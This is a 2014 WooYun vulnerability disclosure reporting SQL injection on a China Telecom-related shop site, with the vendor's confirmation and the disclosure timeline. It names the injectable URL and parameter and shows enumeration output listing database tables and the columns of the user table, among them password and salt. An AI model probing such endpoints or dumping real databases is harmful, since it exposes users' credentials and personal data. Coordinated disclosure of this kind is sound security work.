当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2014-078586
漏洞标题:
电信某站SQL注入漏洞可影响敏感数据
相关厂商:
中国电信
漏洞作者:
老和尚
提交时间:
2014-10-08 10:04
修复时间:
2014-11-22 10:06
公开时间:
2014-11-22 10:06
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
18
漏洞状态:
已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2014-10-08: 细节已通知厂商并且等待厂商处理中
2014-10-11: 厂商已经确认,细节仅向厂商公开
2014-10-21: 细节向核心白帽子及相关领域专家公开
2014-10-31: 细节向普通白帽子公开
2014-11-10: 细节向实习白帽子公开
2014-11-22: 细节向公众公开

简要描述:

又是电信了、

详细说明:

url:
http://www.gd189fq.com/new/ordersuc.php?&orderid=956

QQ图片20140407221117.png


漏洞证明:

Database: newcfshop
[93 tables]
+------------------------+
| cf_account_log         |
| cf_ad                  |
| cf_ad_custom           |
| cf_ad_position         |
| cf_admin_action        |
| cf_admin_log           |
| cf_admin_message       |
| cf_admin_user          |
| cf_adsense             |
| cf_affiliate_log       |
| cf_agency              |
| cf_area_region         |
| cf_article             |
| cf_article_cat         |
| cf_attribute           |
| cf_auction_log         |
| cf_auto_manage         |
| cf_back_goods          |
| cf_back_order          |
| cf_bonus_type          |
| cf_booking_goods       |
| cf_brand               |
| cf_card                |
| cf_cart                |
| cf_cat_recommend       |
| cf_category            |
| cf_collect_goods       |
| cf_comment             |
| cf_crons               |
| cf_delivery_goods      |
| cf_delivery_order      |
| cf_email_list          |
| cf_email_sendlist      |
| cf_error_log           |
| cf_exchange_goods      |
| cf_favourable_activity |
| cf_feedback            |
| cf_friend_link         |
| cf_goods               |
| cf_goods_activity      |
| cf_goods_article       |
| cf_goods_attr          |
| cf_goods_cat           |
| cf_goods_gallery       |
| cf_goods_type          |
| cf_group_goods         |
| cf_keywords            |
| cf_link_goods          |
| cf_mail_templates      |
| cf_member_price        |
| cf_nav                 |
| cf_order               |
| cf_order_action        |
| cf_order_goods         |
| cf_order_info          |
| cf_ordertagcount       |
| cf_pack                |
| cf_package             |
| cf_package_goods       |
| cf_package_link        |
| cf_pay_log             |
| cf_payment             |
| cf_plugins             |
| cf_products            |
| cf_reg_extend_info     |
| cf_reg_fields          |
| cf_region              |
| cf_role                |
| cf_salecount           |
| cf_searchengine        |
| cf_sessions            |
| cf_sessions_data       |
| cf_shipping            |
| cf_shipping_area       |
| cf_shop_config         |
| cf_snatch_log          |
| cf_stats               |
| cf_suppliers           |
| cf_tag                 |
| cf_template            |
| cf_topic               |
| cf_user_account        |
| cf_user_address        |
| cf_user_bonus          |
| cf_user_feed           |
| cf_user_rank           |
| cf_users               |
| cf_virtual_card        |
| cf_volume_price        |
| cf_vote                |
| cf_vote_log            |
| cf_vote_option         |
| cf_wholesale           |
+------------------------+
--
Database: newcfshop
Table: cf_users
[34 columns]
+-----------------+------------------------+
| Column          | Type                   |
+-----------------+------------------------+
| address_id      | mediumint(8) unsigned  |
| alias           | varchar(60)            |
| answer          | varchar(255)           |
| birthday        | date                   |
| credit_line     | decimal(10,2) unsigned |
| ec_salt         | varchar(10)            |
| email           | varchar(60)            |
| flag            | tinyint(3) unsigned    |
| frozen_money    | decimal(10,2)          |
| home_phone      | varchar(20)            |
| is_special      | tinyint(3) unsigned    |
| is_validated    | tinyint(3) unsigned    |
| last_ip         | varchar(15)            |
| last_login      | int(11) unsigned       |
| last_time       | datetime               |
| mobile_phone    | varchar(20)            |
| msn             | varchar(60)            |
| office_phone    | varchar(20)            |
| parent_id       | mediumint(9)           |
| passwd_answer   | varchar(255)           |
| passwd_question | varchar(50)            |
| password        | varchar(32)            |
| pay_points      | int(10) unsigned       |
| qq              | varchar(20)            |
| question        | varchar(255)           |
| rank_points     | int(10) unsigned       |
| reg_time        | int(10) unsigned       |
| salt            | varchar(10)            |
| sex             | tinyint(1) unsigned    |
| user_id         | mediumint(8) unsigned  |
| user_money      | decimal(10,2)          |
| user_name       | varchar(60)            |
| user_rank       | tinyint(3) unsigned    |
| visit_count     | smallint(5) unsigned   |
+-----------------+------------------------+

修复方案:

这,你猜,我来讨礼物的

版权声明:转载请注明来源 老和尚@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-10-11 17:20

厂商回复:

最新状态:

暂无